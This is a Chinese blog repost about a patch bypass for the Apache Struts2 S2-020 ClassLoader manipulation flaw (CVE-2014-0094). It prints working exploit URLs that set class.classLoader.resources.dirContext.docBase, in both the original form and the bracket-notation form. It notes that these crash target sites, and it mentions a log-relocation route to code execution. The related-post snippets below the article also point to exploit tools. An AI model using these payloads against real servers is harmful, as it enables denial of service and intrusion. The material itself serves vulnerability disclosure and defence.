Struts2再曝高危漏洞(S2-020补丁绕过)

最新推荐文章于 2022-09-04 09:46:25 发布
最新推荐文章于 2022-09-04 09:46:25 发布
阅读量169 收藏
点赞数
文章标签: java 操作系统
原文链接:http://www.cnblogs.com/blfshiye/p/5401102.html
版权
之前S2-020漏洞利用方式见drops: Struts2 Tomcat class.classLoader.resources.dirContext.docBase赋值造成的DoS及远程代码运行利用!

临时不清楚究竟是谁发出来的补丁绕过。之前 @Nebula 发的Tomcat:

http://127.0.0.1/s/example/HelloWorld.action?class.classLoader.resources.dirContext.docBase=//192.168.x.x/test


绕过方式是:

http://localhost:8080/Struts2/test.action?class["classLoader"]["resources"]["dirContext"]["docBase"]=xxxxx


补充:
1、高版本号须要用单引號':
class['classLoader']['resources']['dirContext']['docBase']
2、请勿任意尝试,漏洞利用代码会让对方站点挂掉

顺便说下// netbios协议似乎在仅是windows,linux下貌似不能直接使用这种协议。之前有发过:[百度安全中心博客-neobyte]Struts2 S2-020在Tomcat 8下的命令运行分析利用切换日志到web文件夹。有点可行性。


加速乐发了新闻:
http://jiasule.baidu.com/news/5357a1eebf9efd27e6ecbade/
4月23日消息。近日安全研究人员指出Apache Struts2在漏洞公告S2-020里。在处理修复CVE-2014-0094的漏洞修补方案存在漏洞,导致补丁被全然绕过。

眼下官方在GitHub上对该问题做出了修正。该问题被曝光后,百度加速乐已领先升级了防御规则。眼下百度加速乐可独家防御该漏洞。

据了解Struts2已不是第一次出现重大安全事故,去年9月Struts2曝出漏洞。国家多家重要政府站点受到影响,当中不乏部委级站点。此次再次曝出漏洞显现出互联网安全问题的严重性。

转载于:https://www.cnblogs.com/blfshiye/p/5401102.html

weixin_30588827
关注
Struts2 S2-020在Tomcat 8下的命令执行分析1
08-08
%>在tomcat 8.0.3下Struts2.3.16的blank app中执行这段jsp,输出结果如下: (省略部分非相关属性
Struts2 S2-020补丁绕过漏洞
收集盒 Book box
08-28 1426
0×00 背景 安全研究人员指出Apache Struts2漏洞公告S2-020里,在处理修复CVE-2014-0094漏洞修补方案存在漏洞,导致补丁被完全绕过。 0×01 分析 Struts2 S2-020 中加入 (.*\.|^)class\..* 来过滤action参数。然而最近翰海源报告了一种绕过方法(http://blog.vulnhunt.com/index.ph
Apache Struts2 s2-020补丁安全绕过漏洞
weixin_30443747的博客
04-24 297
CNVD-ID CNVD-2014-01552 发布时间 2014-03-11 危害级别 高 影响产品 Apache struts 2.0.0-2.3.16 BUGTRAQ ID 65999 CVE ID CVE-2014-0094 漏洞描述 Apache Struts框架是一个基于Java Servlets...
Struts2 (S2-016/S2-017)高危漏洞修复文件
最新发布
04-06
然而,像任何其他软件一样,Struts2也存在安全漏洞,其中S2-016和S2-017是两个知名的高危漏洞S2-016漏洞,全称为"Struts2 REST插件远程代码执行漏洞",主要影响Struts2的REST插件。该漏洞源于框架在处理XML内容...
struts-2.3.32
03-08
在版本2.3.32中,它包含了对一个重要安全漏洞S2-045的修复,这是一个针对Struts 2框架的高危漏洞。 **S2-045漏洞详解:** S2-045,也被称为“CVE-2017-9791”,是一个远程代码执行(RCE)漏洞,允许攻击者通过精心...
Struts2漏洞利用工具2016版 32.zip
03-07
2016年是Struts2安全事件频繁的一年,特别是S2-045、S2-048和S2-057等高危漏洞的曝光,这些漏洞允许攻击者通过精心构造的HTTP请求参数,远程执行恶意代码,从而获取服务器的控制权。 S2-045,又被称为CVE-2016-...
struts 2 升级所需jar 包集合(升级到2.3.32)
03-24
最近,Struts 2框架被曝光了两个高危漏洞S2-045和S2-046,这两个漏洞对使用较旧版本Struts 2的系统构成了严重威胁。 S2-045漏洞,全称为"Struts 2 OGNL注入漏洞",主要源于Struts 2框架在处理OGNL表达式时的安全...
2.3.15.1 版本以前 struts2漏洞利用工具 和升级到2.3.15.1版本
05-11
Struts2官方在发布2.3.15.1版本时,已经包含了针对这些高危漏洞补丁。因此,对于使用Struts2的开发团队来说,及时升级到这个版本至关重要。升级过程通常包括以下步骤: 1. **备份**:在升级前,务必备份当前项目...
Struts2再曝S2-020补丁绕过漏洞 – 万恶的正则表达式
收集盒 Book box
04-24 977
4月24日,网络曝出文章“安全研究人员指出Apache Struts2漏洞公告S2-020里,在处理修复CVE-2014-0094漏洞修补方案存在漏洞,导致补丁被完全绕过。” 受影响产品: Struts 2.0.0 – Struts 2.3.16.1 成因与威胁: Apache Struts 2.0.0-2.3.16版本的默认上传机制是基于Commons FileUplo
Struts2 S2-020绕过漏洞 解决终极方案
07-10 1217
云攻防系列】漏洞考古归因之Spring与Struts2
m0_73257876的博客
09-04 253
跟入 setParameters() 方法,其中 329 行的newStack.setParameter(name, value) 利用了 OGNL 调用了对应的 Set 方法,而由于每个 action 必然继承容器的classLoader,所以必然可以通过 action 去覆盖 classLoader 的相关属性,修改 tomcat 的日志位置、后缀等造成 RCE。0Day 层出不穷,往往使安全工作人员措手不及,但是漏洞的原理是互通的,我们对于漏洞的防御方式也可以参照以往漏洞。那么该功能如何实现的呢?
s2-020
weixin_34356138的博客
05-04 143
http://www.wooyun.org/bugs/wooyun-2010-049979http://www.waitalone.cn/struts2-s2-020-tomcat-8-0day.htmlhttp://www.longchen.clanmark.com/blog/?post=262jmx-console/status?full=trueweb-consoleadmin-consol...
Struts2】IDEA2020.2.2创建Struts2项目与简单环境搭建
weixin_46329748的博客
05-28 2419
一、创建项目 1.先安装Struts2插件(已安装的可以跳过此步) 点击左上角 File–>Settings–>Plugins 搜索安装Struts2插件即可; 2.然后新建项目,按照如下步骤勾选,注意:勾选Struts2选项后,需要等待几秒才会出现最下方的三个选项,建议选择第三个,我们手动添加jar包(听说有的人自动添加会遇到其他问题,保险起见还是手动添加); 3.给项目命名,然后Finish即可; 4.接下来我们手动添加所需的jar包,jar包列表如下(我的不一定标准,可以多参考和对比
Apache Struts ClassLoader操作漏洞
weixin_30858241的博客
03-11 244
漏洞版本: Apache Struts 2.x 漏洞描述: CVE ID:CVE-2014-0094 Struts2 是第二代基于Model-View-Controller (MVC)模型的java企业级web应用框架。 该应用程序允许访问直接映射到“getClass()”方法的“class”参数 ,这可以被利用来操纵所使用的应用程序服务器的ClassLoader。 ...
s2 安恒 漏洞验证工具_Struts2漏洞检查工具2018版(最新版)V2.0[带批量功能]
weixin_39894255的博客
12-20 3254
2018-08-24:增加S2-057 Struts 2.3 to 2.3.34,Struts 2.5 to 2.5.16 此漏洞影响范围非常小,要求配置条件比较苛刻,同时,一些特定版本没有看到有沙盒绕过,说以,目前exp只是基于S2-045改写的,所以exp并不是所有版本都能用,正常情况下Struts 2.3.5-2.3.31,Struts 2.5-2.5.10版本可以使用此exp。2017-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值